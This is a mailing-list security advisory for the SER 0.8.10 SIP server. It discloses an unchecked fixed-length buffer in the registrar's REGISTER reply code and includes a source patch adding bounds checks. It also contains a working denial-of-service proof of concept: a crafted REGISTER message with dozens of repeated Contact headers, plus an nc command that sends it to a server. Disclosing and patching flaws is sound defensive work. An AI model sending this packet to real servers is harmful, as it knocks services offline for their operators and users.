Re: [Serusers] [HEADS UP] security vulnerability in ser 0.8.10

Folks, While playing with SER I found that I can trigger repeatable crash when doing REGISTER multiple times. Quick glance at the code in question revealed that indeed, when constructing reply to REGISTER message, SER uses fixed-lengh buffer to put all non-expired contacts for that user and doesn't bother to check for overflow. The bug could be easily exploited by a complete stranger on servers that don't perform authentification of REGISTER requests, and by an user with a valid credintals on server that do authentification. Mounting attack leads to denial of service. Attached please find fake REGISTER message, which if sent to open server kills it (nc -u my.sip.server 5060 < register.killser), and patch to fix the problem. -Maxim

$FreeBSD$ --- modules/registrar/reply.c 2003/01/18 00:39:05 1.1 +++ modules/registrar/reply.c 2003/01/18 01:13:13 @@ -53,32 +53,57 @@ */ void build_contact(ucontact_t* _c) { + char *lastgoodend; + int nummissed; + l = 0; + lastgoodend = b; while(_c) { if (_c->expires > act_time) { + if (l + 10 >= MAX_CONTACT_BUFFER) + break; memcpy(b + l, "Contact: <", 10); l += 10; + if (l + _c->c.len >= MAX_CONTACT_BUFFER) + break; memcpy(b + l, _c->c.s, _c->c.len); l += _c->c.len; + if (l + 4 >= MAX_CONTACT_BUFFER) + break; memcpy(b + l, ">;q=", 4); l += 4; - l += sprintf(b + l, "%-3.2f", _c->q); + l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%-3.2f", _c->q); + if (l >= MAX_CONTACT_BUFFER) + break; + if (l + 9 >= MAX_CONTACT_BUFFER) + break; memcpy(b + l, ";expires=", 9); l += 9; - l += sprintf(b + l, "%d", (int)(_c->expires - act_time)); - + l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%d", (int)(_c->expires - act_time)); + if (l >= MAX_CONTACT_BUFFER) + break; + + if (l + 2 >= MAX_CONTACT_BUFFER) + break; *(b + l++) = '\r'; *(b + l++) = '\n'; + lastgoodend = b + l; } _c = _c->next; } - + if (lastgoodend - b != l) { + l = lastgoodend - b; + for(nummissed = 0; _c; _c = _c->next) + nummissed++; + LOG(L_ERR, "build_contact(): Contact list buffer exhaused, %d contact(s) ignored\n", nummissed); + } + DBG("build_contact(): Created Contact HF: %.*s\n", l, b); }

REGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.2:123;branch=z9hG4bKnashds7 Max-Forwards: 70 To: Bob <sip:bob@biloxi.com> From: Bob <sip:bob@biloxi.com>;tag=456248 Call-ID: 843817637684230@998sdasdh09 CSeq: 1826 REGISTER Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Contact: <sip:bob@192.0.2.4> Expires: 7200 Content-Length: 0 User-Agent: Cisco ATA v2.15 ata186 (020918a)